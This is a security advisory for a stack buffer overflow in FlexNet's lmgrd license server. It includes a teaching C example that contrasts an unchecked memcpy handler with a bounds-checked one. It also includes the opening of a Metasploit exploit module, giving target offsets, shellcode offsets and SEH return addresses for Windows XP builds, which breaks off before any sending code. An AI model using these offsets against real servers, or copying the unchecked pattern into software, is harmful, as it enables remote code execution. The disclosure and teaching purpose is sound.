FlexNet License Server Manager 'lmgrd' Component Stack Buffer Overflow

Published: 2012-03-26
Updated: 2012-05-23

Affected systems:
Flexera FlexNet License Server Manager 11.9.1
Unaffected systems:
Flexera FlexNet License Server Manager 11.10
Description:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 52718

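Flexera is a provider of strategic solutions for application usage management. FlexNet Publisher provides technology for customizing pricing, packaging and software license terms, and also prevents unauthorized use. lmgrd is the license server manager that listens on port 27000 and runs as a system service for a variety of products.

The lmgrd License Server Manager in FlexNet Publisher contains an implementation flaw: sending a specially crafted packet to the server can cause a stack overflow, leading to arbitrary code execution.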
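
As an added illustration (not code from lmgrd, the advisory, or the Metasploit module): the module description quoted further down attributes the overflow to an insecure memcpy while handling network packets. The C example shows that bug class beside its bounds-checked form; the 2-byte length header, the 64-byte buffer and both function names are assumptions, since the page does not describe lmgrd's actual message layout.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HDR_LEN  2   /* hypothetical header: 16-bit big-endian payload length */
#define BUF_SIZE 64  /* hypothetical fixed-size stack buffer in the handler */

/* Vulnerable pattern: the length field taken from the packet drives memcpy
 * directly, so any declared length above BUF_SIZE writes past `buf`. */
int handle_unchecked(const uint8_t *pkt, size_t pkt_len)
{
    uint8_t buf[BUF_SIZE] = {0};
    size_t declared = ((size_t)pkt[0] << 8) | pkt[1];
    (void)pkt_len;                    /* received size is never consulted */
    memcpy(buf, pkt + HDR_LEN, declared);
    return (int)buf[0];
}

/* Hardened form: returns the number of payload bytes copied into `out`,
 * or -1 if the packet is truncated or the declared length does not fit. */
int handle_checked(const uint8_t *pkt, size_t pkt_len,
                   uint8_t *out, size_t out_cap)
{
    if (pkt == NULL || out == NULL || pkt_len < HDR_LEN)
        return -1;                    /* header itself is incomplete */
    size_t declared = ((size_t)pkt[0] << 8) | pkt[1];
    if (declared > pkt_len - HDR_LEN)
        return -1;                    /* claims more bytes than were received */
    if (declared > out_cap)
        return -1;                    /* would overflow the destination */
    memcpy(out, pkt + HDR_LEN, declared);
    return (int)declared;
}

int main(void)
{
    /* Constructed sample packets, not captured lmgrd traffic. */
    const uint8_t ok[]  = {0x00, 0x03, 'a', 'b', 'c'};
    const uint8_t bad[] = {0x10, 0x00, 'x'};  /* declares 4096, carries 1 */
    uint8_t out[BUF_SIZE];
    printf("well-formed: %d\n", handle_checked(ok, sizeof ok, out, sizeof out));
    printf("oversized:   %d\n", handle_checked(bad, sizeof bad, out, sizeof out));
    return 0;
}
```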

<*Source: Luigi Auriemma (aluigi@pivx.com)
 
  Links:
       
       
*>

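Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is intended for security research and teaching only. Use at your own risk!

Luigi Auriemma (aluigi@pivx.com) provided the following test method: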

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#  
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'FlexNet License Server Manager lmgrd Buffer Overflow',
      'Description'    => %q{
          This module exploits a vulnerability in the FlexNet
        License Server Manager.

          The vulnerability is due to the insecure usage of memcpy
        in the lmgrd service when handling network packets, which
        results in a stack buffer overflow.

          In order to improve reliability, this module will make lots of
        connections to lmgrd during each attempt to maximize its success.
      },
      'Author'         =>
        [
          'Luigi Auriemma', # Vulnerability Discovery and PoC
          'Alexander Gavrun', # Vulnerability Discovery
          'juan vazquez', # Metasploit module
          'sinn3r' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '81899' ],
          [ 'BID', '52718' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-052/' ],
          [ 'URL', 'http://aluigi.altervista.org/adv/lmgrd_1-adv.txt' ]
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process'
        },
      'Payload' =>
        {
          'Space' => 4000
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Debug', {} ],
          [ 'Autodesk Licensing Server Tools 11.5 / lmgrd 11.5.0.0 / Windows XP SP3',
            {
              'Offset' => 10476,
              'ShellcodeOffset' => 5504,
              'Ret' => 0x0047d01f # ppr from lmgrd.exe
            }
          ],
          [ 'Alias License Tools 10.8.0.7 / lmgrd 10.8.0.7 / Windows XP SP3',
            {
              'Offset' => 7324,
              'ShellcodeOffset' => 2332,
              'Ret' => 0x004eda91 # ppr from lmgrd.exe
            }
          ],
          [ 'Alias License Tools 10.8 / lmgrd 10.8.0.2 / Windows XP SP3',
            {
              'Offset' => 7320,
              'ShellcodeOffset' => 2328,
              'Ret' => 0x004eb2e1 # ppr from lmgrd.exe
            }
          ],
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 23 2012'))
